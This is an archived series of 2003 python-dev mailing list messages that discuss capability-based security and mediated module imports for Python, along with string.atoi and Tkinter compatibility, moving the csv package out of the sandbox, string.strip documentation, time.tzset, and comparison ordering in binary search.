>>Capabilities can loosely be thought of like bound methods.  Security with
>>capabilities is done based on possession; if you hold a reference to an
>>object you can use that object.
> 
> 
> No -- capabilities (as envisioned for Python) are references.  Whether a 
> reference to an object, to a bound method, or to a function doesn't matter.
> 
> Note that it isn't that capabilities are "like" references, it is that 
> capabilities *are* references.  Every reference is a capability.  Every 
> capability is a reference.

I should note that this is a new (and good) idea, not one that we've 
previously expressed. And, of course, they are references with 
restrictions, which will be spelt out in the PEP.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From zooko@zooko.com  Tue Mar 18 12:41:23 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 07:41:23 -0500
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: Message from Zooko <zooko@zooko.com>
 of "Tue, 18 Mar 2003 06:40:41 EST." <E18vFST-0000U4-00@localhost>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>  <E18vFST-0000U4-00@localhost>
Message-ID: <E18vGPD-0000Zv-00@localhost>

brett@python.org wrote:
>
> Security with capabilities is done based on possession; if you hold a 
> reference to an object you can use that object.

Note that you can use capabilities as your sole access control mechanism if 
every resource that you want to protect is identifiable with a Python reference.

For example, suppose you want to control the ability to listen on sockets for 
network traffic.  If there is a reference (e.g., to an object) that represents 
the privilege of listening on sockets, then you can give such a reference to one 
object, allowing that object it to listen on sockets, while withholding it from 
another object, thus preventing that one from listening on sockets.

The only part of Python that isn't already well-matched with capabilities is the 
way that authority is gained by importing modules, and you can load a module 
even when you weren't given a reference to it.  Reconciling Python modules with 
capabilities would be the challenging part.  Python objects, bound methods, 
functions, and suchlike are already well-matched to capabilities.

In case that isn't clear, I'll write a quick example.  Recalling my "tic-tac-toe 
game" example from [1], I wrote code which allowed or denied the tic-tac-toe 
game to paint a window on the screen and to write to a file.  This "allow-or-
deny" enforcement was unified with the designation of which window and which 
file.  That is: by passing a reference to a certain window, I simultaneously 
told the tic-tac-toe game which window to draw in *and* extended to it the 
privilege of drawing to the screen.

This is a central motto of the capability security crowd: "Unify designation 
with authority."

In a capability system *all* authority -- everything that you could ever want to 
prevent -- is mediated by capabilities.  Code that is loaded and run, but to 
which no capabilities are extended, must be incapable of doing anything 
dangerous.

Now, what about modules?  In current Python, some code can "import os" and gain 
all kinds of authority.  In the rexec scheme, as I understand it, there was a 
handler function which could be overridden to determine what happens when I try 
"import os".  This is effectively a "policy mini-language", such as in the 
hypothetical "restricted Python v2" [1].

(Guido has pointed out that this overridable policy handler could be used to 
implement capabilities as well as other regimes.  I think I agree in principle, 
but what I am advocating here is having the core language implement capabilities 
so that the programmer-visible part is as minimal and unified as possible.)

Now what I would *like* is that instead of doing "import os" to load code, 
instead the caller provides, or doesn't provide the os module as part of the 
construction/invocation of A.

I don't have a clear idea yet of how that could be implemented in a Pythonic, 
compatible way.

Just to help me think about it I'll suggest a non-Pythonic and incompatible way: 
there is no "import" keyword.  When you invoke a constructor, function, method, 
etc., you have to pass as arguments references to everything that the code will 
need to do its job.  So, assuming the tic-tac-toe game requires the "math" 
module and the "string" module, I would have to write:

# restricted Python v3+modules
game = TicTacToeGame()
game.display(open("/tmp/tttgame.out","w"), math, string)

The burden of typing in dozens of module names with each invocation can be eased 
by: 1. bundling modules together (put math, string, and some other stuff into 
one object/module/package named "standardstuff" and pass that as an argument), 
2. "safe" modules that nobody could ever wish to prevent could be globally 
available (via the resurrected "import" keyword, I guess).

If math and string are both "safe", then the example goes back to:

# restricted Python v3+modules
game = TicTacToeGame()
# a game against itself that writes results to a file
game.display(open("/tmp/tttgame.out","w"))

# a game against remote, listening on a socket
game.display(open("/tmp/tttgame.out","w"), socket)

(Note that there is a bootstrapping problem -- *some* code has to receive a 
reference to the os module ex nihilo.  That code should be "trusted" code -- the 
Python interpreter, basically.)

Ah, but this last line shows another problem -- the game now has the socket 
module, and the ability to open sockets to remote hosts and more.  I just wanted 
to allow it to listen on a particular port!  The code would be safer if I didn't 
pass the large-grained module and instead passed a specific object:

# a game against remote, listening on a socket
listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listensocket.bind(('daring.cwi.nl', 8901,))
game.display(open("/tmp/tttgame.out","w"), listensocket)

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/033938.html


From zooko@zooko.com  Tue Mar 18 12:44:47 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 07:44:47 -0500
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: Message from Ben Laurie <ben@algroup.co.uk>
 of "Tue, 18 Mar 2003 12:11:09 GMT." <3E770CDD.7050206@algroup.co.uk>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <E18vFST-0000U4-00@localhost>  <3E770CDD.7050206@algroup.co.uk>
Message-ID: <E18vGSV-0000bt-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Ben Laurie <ben@algroup.co.uk> wrote:
>
> > No -- capabilities (as envisioned for Python) are references.  Whether a 
> > reference to an object, to a bound method, or to a function doesn't matter.
> 
> I should note that this is a new (and good) idea, not one that we've 
> previously expressed. And, of course, they are references with 
> restrictions, which will be spelt out in the PEP.

Yes.  It isn't that Brett missed something and I corrected him, it's that I just 
asserted an idea that hasn't previously been posted to the list.

Is the python-dev summary allowed to describe ideas posted in discussion of the 
python-dev summary?  ;-)

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Tue Mar 18 13:56:12 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 18 Mar 2003 08:56:12 -0500
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: Your message of "Tue, 18 Mar 2003 07:15:09 EST."
 <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer> <3E76EBE5.8020200@lemburg.com>
 <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303181356.h2IDuEv19695@odiug.zope.com>

[RH]
> > > Does anyone think changin string.atoi is the wrong way to go?

[MAL]
> > Yes, because it changes the semantics. string.atoi() would suddenly
> > start to accept non-strings like integers, floats, etc.
> > 
> > My suggestion would be to carefully reconsider the changes to
> > _tkinter. If it's true that a method can now return strings *and*
> > integers which previously only returned strings, then such a
> > change is clearly not backward compatible.  I'd create a new
> > method for the new semantics in that case.

[GvR]
> That's my gut feeling too.

I misspoke.  I agree with MAL that string.atoi() shouldn't be
changed.  But I didn't mean to imply that I wanted the changes to
_tkinter and Tkinter to be rolled back.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@pythoncraft.com  Tue Mar 18 16:25:07 2003
From: aahz@pythoncraft.com (Aahz)
Date: Tue, 18 Mar 2003 11:25:07 -0500
Subject: [Python-Dev] Capabilities
Message-ID: <20030318162507.GB13338@panix.com>

On Tue, Mar 18, 2003, Zooko wrote:
>
> No -- capabilities (as envisioned for Python) are references.  Whether
> a reference to an object, to a bound method, or to a function doesn't
> matter.
>
> Note that it isn't that capabilities are "like" references, it is
> that capabilities *are* references.  Every reference is a capability.
> Every capability is a reference.

<blink>  Are you saying that an int is a capability?
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From aahz@pythoncraft.com  Tue Mar 18 16:26:23 2003
From: aahz@pythoncraft.com (Aahz)
Date: Tue, 18 Mar 2003 11:26:23 -0500
Subject: [Python-Dev] capability-mediated modules
Message-ID: <20030318162623.GC13338@panix.com>

On Tue, Mar 18, 2003, Zooko wrote:
>
> For example, suppose you want to control the ability to listen on
> sockets for network traffic.  If there is a reference (e.g., to an
> object) that represents the privilege of listening on sockets, then
> you can give such a reference to one object, allowing that object it
> to listen on sockets, while withholding it from another object, thus
> preventing that one from listening on sockets.

Doesn't that only work if the second object never gains a reference to
the first object?
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From zooko@zooko.com  Tue Mar 18 16:55:05 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 11:55:05 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Aahz <aahz@pythoncraft.com>
 of "Tue, 18 Mar 2003 11:25:07 EST." <20030318162507.GB13338@panix.com>
References: <20030318162507.GB13338@panix.com>
Message-ID: <E18vKMj-0002Zb-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Aahz <aahz@pythoncraft.com> wrote:
>
> > No -- capabilities (as envisioned for Python) are references.  Whether
> > a reference to an object, to a bound method, or to a function doesn't
> > matter.
> >
> > Note that it isn't that capabilities are "like" references, it is
> > that capabilities *are* references.  Every reference is a capability.
> > Every capability is a reference.
> 
> <blink>  Are you saying that an int is a capability?

Do you mean: references are really just memory addresses?  Python has pointer-
safety so Python code cannot access a Python object without a reference to it, 
even if it knows that object's memory address.  This is the first requirement 
listed in this message: [1].

Or do you mean: I could have a reference to some fundamental computational 
concept like an int -- would that reference be a capability?

I would say yes, all references, even to some basic programming language 
constructs like None or True, are capabilities.  Things like None, True, 
integers, etc., need to be available to all code (just so that we don't have to 
pass the same bundle of dozens of standard references to every object we 
create).  Fortunately they can also be made safe so that it is okay for 
untrusted code to access them.  Unfortunately the current implementations of 
things like None are not safe [2].

This is part of the third requirement listed in [1].

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/033891.html
[2] http://mail.python.org/pipermail/python-dev/2003-March/033945.html


From pje@telecommunity.com  Tue Mar 18 17:41:01 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 18 Mar 2003 12:41:01 -0500
Subject: [Python-Dev] capability-mediated modules
Message-ID: <5.1.1.6.0.20030318123644.01dfe310@mail.rapidsite.net>

Zooko wrote:
 >Just to help me think about it I'll suggest a non-Pythonic and 
incompatible way:
 >there is no "import" keyword.  When you invoke a constructor, function, 
method,
 >etc., you have to pass as arguments references to everything that the 
code will
 >need to do its job.  So, assuming the tic-tac-toe game requires the "math"
 >module and the "string" module, I would have to write:

There's a *much* simpler way to do this.  'import' is implemented by 
calling an '__import__' function -- which of course is a capability.  To do 
mediated imports, it's only necessary to supply a mediating version of 
'__import__'.  One also needs a specialized version of '__import__' to set 
up a newly imported module's builtins.


From zooko@zooko.com  Tue Mar 18 18:01:05 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 13:01:05 -0500
Subject: [Python-Dev] capability-mediated modules
In-Reply-To: Message from "Phillip J. Eby" <pje@telecommunity.com>
 of "Tue, 18 Mar 2003 12:41:01 EST." <5.1.1.6.0.20030318123644.01dfe310@mail.rapidsite.net>
References: <5.1.1.6.0.20030318123644.01dfe310@mail.rapidsite.net>
Message-ID: <E18vLOb-0006ln-00@localhost>

 "Phillip J. Eby" <pje@telecommunity.com> wrote:
>
> There's a *much* simpler way to do this.  'import' is implemented by 
> calling an '__import__' function -- which of course is a capability.  To do 
> mediated imports, it's only necessary to supply a mediating version of 
> '__import__'.  One also needs a specialized version of '__import__' to set 
> up a newly imported module's builtins.

I'm aware of this feature, but I was groping for a more elegant (and more 
capability-flavored) way to do it.

As far as I can tell, the technique you describe is the "policy mini-language" 
way to implement access control.  If I want a certain chunk of code to have 
access to a certain module, I set the policy with an overridable handler or a 
configuration object, specifying that this code is allowed to have access to 
this module, and then I invoke the code.

This is analogous to "restricted Python v2"'s way of controlling access to 
certain resources in this e-mail message [1].

If I change my mind about how the code should work, I have to make changes in 
two places: first the part of the code that says "import spam" has to change to 
say "import eggs", and second the policy configuration has to change from 
"suchandsuch is allowed to import spam" to "suchandsuch is allowed to import 
eggs".

In a pure capability language like E, whenever a module is imported it comes 
into life without permission to do anything, and then the importer grants it 
permission to do whatever it needs to do (by passing references).  This is more 
like "restricted Python v3" in that designating which module the code ought to 
use, and authorizing the code to use that module, are both done in the same act 
(by passing a reference to the module in question).

There is a description with examples in the "E in a Walnut" book [2].

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/033938.html
[2] http://www.skyhunter.com/marcs/ewalnut.html#SEC16


From zooko@zooko.com  Tue Mar 18 16:36:42 2003
From: zooko@zooko.com (Zooko)
Date: Tue, 18 Mar 2003 11:36:42 -0500
Subject: [Python-Dev] capability-mediated modules
In-Reply-To: Message from Aahz <aahz@pythoncraft.com>
 of "Tue, 18 Mar 2003 11:26:23 EST." <20030318162623.GC13338@panix.com>
References: <20030318162623.GC13338@panix.com>
Message-ID: <E18vK4w-0002LB-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Aahz <aahz@pythoncraft.com> wrote:
>
> > For example, suppose you want to control the ability to listen on
> > sockets for network traffic.  If there is a reference (e.g., to an
> > object) that represents the privilege of listening on sockets, then
> > you can give such a reference to one object, allowing that object it
> > to listen on sockets, while withholding it from another object, thus
> > preventing that one from listening on sockets.
> 
> Doesn't that only work if the second object never gains a reference to
> the first object?

This is why real mandatory private data is needed.  The second object could have 
a reference to the first object, and could use the first object through some 
interface offered by the first object, without being able to access the first 
object's socket-listener capability.

Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From martin@v.loewis.de  Tue Mar 18 20:40:32 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 18 Mar 2003 21:40:32 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <3E76EBE5.8020200@lemburg.com>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
 <3E76EBE5.8020200@lemburg.com>
Message-ID: <m3of481k8v.fsf@mira.informatik.hu-berlin.de>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> If it's true that a method can now return strings *and*
> integers which previously only returned strings

That is not true.

Regards,
Martin


From martin@v.loewis.de  Tue Mar 18 20:41:50 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 18 Mar 2003 21:41:50 +0100
Subject: [Python-Dev] Shortcut bugfix
In-Reply-To: <200303181356.h2IDuEv19695@odiug.zope.com>
References: <001501c2ecee$be00f2e0$125ffea9@oemcomputer>
 <3E76EBE5.8020200@lemburg.com>
 <200303181215.h2ICF9j21821@pcp02138704pcs.reston01.va.comcast.net>
 <200303181356.h2IDuEv19695@odiug.zope.com>
Message-ID: <m3k7ew1k6p.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> I misspoke.  I agree with MAL that string.atoi() shouldn't be
> changed.  But I didn't mean to imply that I wanted the changes to
> _tkinter and Tkinter to be rolled back.

I'd like to understand the problem with Pmw first, and I agree that
changing atoi is not the right solution, regardless of what the
problem is.

Regards,
Martin


From drifty@alum.berkeley.edu  Tue Mar 18 21:45:35 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Tue, 18 Mar 2003 13:45:35 -0800 (PST)
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <E18vGSV-0000bt-00@localhost>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU>
 <E18vFST-0000U4-00@localhost>  <3E770CDD.7050206@algroup.co.uk>
 <E18vGSV-0000bt-00@localhost>
Message-ID: <Pine.SOL.4.53.0303181344540.20827@death.OCF.Berkeley.EDU>

[Zooko]

> Is the python-dev summary allowed to describe ideas posted in discussion of the
> python-dev summary?  ;-)
>

This is all going into the current summary.  Wasn't expecting this to
generate new content, though.  =)

-Brett


From tismer@tismer.com  Tue Mar 18 22:46:11 2003
From: tismer@tismer.com (Christian Tismer)
Date: Tue, 18 Mar 2003 23:46:11 +0100
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
In-Reply-To: <Pine.SOL.4.53.0303181344540.20827@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303171510130.3853@death.OCF.Berkeley.EDU> <E18vFST-0000U4-00@localhost>  <3E770CDD.7050206@algroup.co.uk>  <E18vGSV-0000bt-00@localhost> <Pine.SOL.4.53.0303181344540.20827@death.OCF.Berkeley.EDU>
Message-ID: <3E77A1B3.7040108@tismer.com>

Brett Cannon wrote:
> [Zooko]
> 
> 
>>Is the python-dev summary allowed to describe ideas posted in discussion of the
>>python-dev summary?  ;-)
>>
> 
> 
> This is all going into the current summary.  Wasn't expecting this to
> generate new content, though.  =)

Hee hee, be aware of infinite recursion :-)

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From csv@mail.mojam.com  Tue Mar 18 23:09:46 2003
From: csv@mail.mojam.com (Skip Montanaro)
Date: Tue, 18 Mar 2003 17:09:46 -0600
Subject: [Python-Dev] csv package ready for prime-time?
Message-ID: <15991.42810.167975.876841@montanaro.dyndns.org>

I'm ready to move the csv package out of the sandbox into the main CVS
trunk.  Since my last post there have been a few changes and comments:

    * Cliff Wells contributed his csv file parameter sniffing code

    * The installation is now a package instead of a single module (not sure
      if the docs have caught up with this change yet)

    * On the mailing list, the following threads of significance are found:

      - John Machin pointed out a few bugs and raised issues with my
        decision to ignore blank lines in my DictReader class.  I don't
        believe we ever reached a concensus we were both happy with.  (That
        is, John may still be slightly unhappy with the current results.  I
        didn't change the behavior as a result of the thread.)

      - Andrew Dalke reported some problems using a space character as the
        delimiter which appear to be resolved.

Is there a formal process for "dusting off" software which has been playing
in the sandbox?  What about getting PEP 305 stamped with the BDFL seal of
approval?  (I realize Guido's busy in the run-up to PyCon.)

As a gentle reminder, the relevant URLs are

    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/nondist/sandbox/csv/
    http://www.python.org/peps/pep-0305.html

You can browse the mailing list archives at

    http://manatee.mojam.com/pipermail/csv

You can check out the code and play with it fairly easily.  From your
sandbox directory execute

    cvs up -dP .
    cd csv
    python setup.py install

Feedback to the csv mailing list please (Reply-To: adjusted accordingly).

Skip


From greg@cosc.canterbury.ac.nz  Tue Mar 18 23:17:55 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 19 Mar 2003 11:17:55 +1200 (NZST)
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: <E18vGPD-0000Zv-00@localhost>
Message-ID: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>

Zooko <zooko@zooko.com>:

> Now what I would *like* is that instead of doing "import os" to load code, 
> instead the caller provides, or doesn't provide the os module as part of the 
> construction/invocation of A.
> 
> I don't have a clear idea yet of how that could be implemented in a 
> Pythonic, compatible way.

Maybe, instead of there being one ultra-global namespace for importing
modules from, it should be part of a function's environment. By
default a function invocation would inherit the "import environment"
of it's caller, but the caller could override this to provide a more
restricted environment.

This would be equivalent to passing in a set of allowable
modules as an implicit parameter to every call.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Tue Mar 18 23:48:43 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 19 Mar 2003 11:48:43 +1200 (NZST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <20030318162507.GB13338@panix.com>
Message-ID: <200303182348.h2INmhK09178@oma.cosc.canterbury.ac.nz>

Aahz <aahz@pythoncraft.com>:

> <blink>  Are you saying that an int is a capability?

Some integers could confer quite powerful capabilities.  42, for
example, apparently gives us the capability of knowing the answer to
the ultimate question of life, the universe and everything, which has
to be a pretty awesome thing to know!

All we need now is a capability which gives us access to the
question...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tdelaney@avaya.com  Wed Mar 19 00:05:03 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 19 Mar 2003 11:05:03 +1100
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE2E7D33@au3010avexu1.global.avaya.com>

> From: Christian Tismer [mailto:tismer@tismer.com]
> >=20
> > This is all going into the current summary.  Wasn't=20
> expecting this to
> > generate new content, though.  =3D)
>=20
> Hee hee, be aware of infinite recursion :-)

I wouldn't expect it to be that much of a problem. Each time through =
seems to take a lot of time, so there are plenty of opportunities to =
break out of the infinite recursion before the net fills up ...

Tim Delaney


From guido@python.org  Wed Mar 19 01:22:28 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 18 Mar 2003 20:22:28 -0500
Subject: [Python-Dev] csv package ready for prime-time?
In-Reply-To: "Your message of Tue, 18 Mar 2003 17:09:46 CST."
 <15991.42810.167975.876841@montanaro.dyndns.org>
References: <15991.42810.167975.876841@montanaro.dyndns.org>
Message-ID: <200303190122.h2J1MSI22680@pcp02138704pcs.reston01.va.comcast.net>

> Is there a formal process for "dusting off" software which has been
> playing in the sandbox?  What about getting PEP 305 stamped with the
> BDFL seal of approval?  (I realize Guido's busy in the run-up to
> PyCon.)

I have no bandwidth for looking at this until after I'm back from the
UK Python conference (April 7), but I think there's no reason why you
should wait for me with moving the csv package to the dist/src tree.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From neal@metaslash.com  Wed Mar 19 01:31:48 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Tue, 18 Mar 2003 20:31:48 -0500
Subject: [Python-Dev] string.strip doc vs code mismatch
Message-ID: <20030319013148.GX14067@epoch.metaslash.com>

Could someone please review the patch attached to this bug:

        http://python.org/sf/697220

There are two patches attached--one for 2.3 and one for 2.2.3.
As you may recall, there was a parameter added to all the strip
methods for 2.3.  This was inadvertantly backported to 2.2.2,
but only for string and unicode methods.

Sometime back it was decided to update the string module for 2.2.2 to
stay in sync with the string/unicode methods.  However, there have
been various partial fixes.  I believe the patches correct all
the problems:

        * fix differences between extra param name--it was referred to 
          as both chars and sep in code/doc, always use chars
        * update docstrings, add notes about chars param (sep -> chars)
        * add chars param to each string.*strip() function
          (ie, lstrip, rstrip)
        * update doc with functionality and to correct when the param
          was added

Neal


From zen@shangri-la.dropbear.id.au  Thu Mar 20 05:01:33 2003
From: zen@shangri-la.dropbear.id.au (Stuart Bishop)
Date: Thu, 20 Mar 2003 16:01:33 +1100
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFMEBAB.tim.one@comcast.net>
Message-ID: <057832A9-5A91-11D7-8A30-000393B63DDC@shangri-la.dropbear.id.au>

On Monday, March 17, 2003, at 01:17  PM, Tim Peters wrote:

> [Guido]
>> ...
>> I don't know if it makes sense to provide tzset() on Windows; from
>> Tim's description it doesn't sound likely.
>
> I wouldn't object if someone else wanted to do the work (which includes
> documenting it well enough to cut off an endless stream of obvious
> questions).  The Windows tzset is weak but maybe usable for some 
> people.
> For example, time zone names must be exactly 3 characters, and you 
> can't
> tell the Windows tzset when daylight time begins or ends:  it uses US 
> rules
> no matter what the time zone.  The native Win32 
> SetTimeZoneInformation()
> doesn't suffer these idiocies, but I'm not sure whether calling that 
> affects
> the Unixish _tzname (etc) variables.  "Doing the work" also means 
> figuring
> out all that stuff.

I've submitted an update to SF:
	http://www.python.org/sf/706707

This version should only build time.tzset if it accepts the TZ 
environment
variable formats documented at:
	http://www.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap08.html
So it shouldn't build under Windows.

The last alternative would be to expose time.tzset if it exists at all,
and the test suite would simply check to make sure it doesn't raise
an exception. This would leave behaviour totally up to the OS, and the
corresponding lack of documentation in the Python library reference.

-- 
Stuart Bishop <zen@shangri-la.dropbear.id.au>
http://shangri-la.dropbear.id.au/


From tim_one@email.msn.com  Thu Mar 20 05:09:53 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 20 Mar 2003 00:09:53 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303172334.h2HNY2j13488@europa.research.att.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEPDEBAB.tim_one@email.msn.com>

[Andrew Koenig]
> I'm beginning to wonder if part of what's going on is that there are
> really two different concepts that go under the general label of
> "comparison", namely the cases where trichotomy does and does not apply.
>
> In the first case, we have a total ordering; in the second, we have what
> C++ calls a "strict weak ordering", which is really an ordering of
> equivalence classes.

I'm afraid Python people really want a total ordering, because that's what
Python gave them at the start (ya, I understand the long vs float business,
but nobody in real life ever griped about that).  It's a curious thing that
the *specific* total ordering Python supplied changed across releases, and
nobody complained about that(*).  Also curious that, within a release,
nobody complained that the specific total ordering can change across program
runs (comparisons falling back to comparing object addresses are consistent
within a run, but not necessarily across runs).

That doesn't deny there are multiple comparison concepts people want, it
just speaks against a strict weak ordering being one of them.  For example,
when using binary search on a sorted list to determine membership, people
want total ordering.  OTOH, when faced with 42 < "42" in isolation, sane
Python people want an exception.  When faced with "x in
sequence_or_mapping", most people want __eq__ but some people want object
identity (e.g., it's not always helpful that 3 == 3.0).

One size doesn't fit anyone all the time.


(*) I have to take that back:  people *did* complain when the relative
position of None changed.  It's an undocumented fact that None compares
"less than" non-None objects now (of types that don't force a different
outcome), but that wasn't always so, and I clearly recall a few complaints
after that changed, from people who apparently deliberately relied on its
equally undocumented comparison behavior before.


From tim_one@email.msn.com  Thu Mar 20 05:58:55 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 20 Mar 2003 00:58:55 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <yu99znnuxbsi.fsf@europa.research.att.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPGEBAB.tim_one@email.msn.com>

[ark@research.att.com]
> The binary-search routines in the C++ standard library mostly avoid
> having to do != comparisons by defining their interfaces in the
> following clever way:
>
>         binary_search   returns a boolean that indicates whether the
>                         value sought is in the sequence.  It does not
>                         say where that value is.
>
>         lower_bound     returns the first position ahead of which
>                         the given value could be inserted without
>                         disrupting the ordering of the sequence.
>
>         upper_bound     returns the last position ahead of which
>                         the given value could be inserted without
>                         disrupting the ordering of the sequence.

These last two are quite like Python's bisect.bisect_{left, right}, which
are implemented using only __lt__ element comparison.

>         equal_range     returns (lower_bound, upper_bound) as a pair.
>
> In Python terms:
>
>         binary_search([3, 5, 7], 6)  would yield False
>         binary_search([3, 5, 7], 7)  would yield True
>         lower_bound([1, 3, 5, 7, 9, 11], 9)    would yield 4
>         lower_bound([1, 3, 5, 7, 9, 11], 8)    would also yield 4
>         upper_bound([1, 3, 5, 7, 9, 11], 9)    would yield 5

>>> import bisect
>>> x = [1, 3, 5, 7, 9, 11]
>>> bisect.bisect_left(x, 9)
4
>>> bisect.bisect_left(x, 8)
4
>>> bisect.bisect_right(x, 9)
5
>>>

We conclude that C++ did something right <wink>.

>         equal_range([1, 1, 3, 3, 3, 5, 5, 5, 7], 3)
>                                 would yield (2, 5).
>
> If you like, equal_range(seq, x) returns (l, h) such that all the
> elements of seq[l:h] are equal to x.  If l == h, the subsequence is
> the empty sequence between the two adjacent elements with values that
> bracket x.
>
> These definitions turn out to be useful in practice, and are also
> easy to implement efficiently using only < comparisons.

I think Python got the most valuable of these, and they're useful in Python
too.  Nevertheless, if you're coding an explicit conventional binary search
tree (nodes containing a value, a reference to "a left" node, and a
reference to "a right" node), cmp() is more convenient; and even more so if
you're coding a ternary search tree.

Sometimes cmp allows for more compact code.  Python's previous samplesort
implementation endured a *little* clumsiness to infer equality (a == b) from
not (a<b or a>b).  The current adaptive mergesort feels the restriction to <
more acutely and in more places.  For example, when merging two runs A and
B, part of the adaptive strategy is to precompute, via a form of binary
search, where A[0] belongs in B, and where B[-1] belongs in A.  This sounds
like two instances of the same task, but they're maddeningly different
because-- in order to preserve stability --the first search needs to be of
the bisect_left flavor and the second of bisect_right.  Combining both modes
of operation in a single search routine with a flag argument, and sticking
purely to __lt__, leads to horridly obscure code, so these searches are
actually implemented by distinct functions.  If it were able to use cmp()
instead, folding them into one routine would have been unobjectionable (if <
is needed, check for cmp < 0; if <= is needed, check for cmp <= 0 same-as
cmp < 1; so 0 or 1 could be passed in to select between < and <= very
efficiently and reasonably clearly).


From ben@algroup.co.uk  Thu Mar 20 10:33:26 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Thu, 20 Mar 2003 10:33:26 +0000
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary
 for 2003-03-01 through 2003-03-15)
In-Reply-To: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
Message-ID: <3E7998F6.6010201@algroup.co.uk>

Greg Ewing wrote:
> Zooko <zooko@zooko.com>:
> 
> 
>>Now what I would *like* is that instead of doing "import os" to load code, 
>>instead the caller provides, or doesn't provide the os module as part of the 
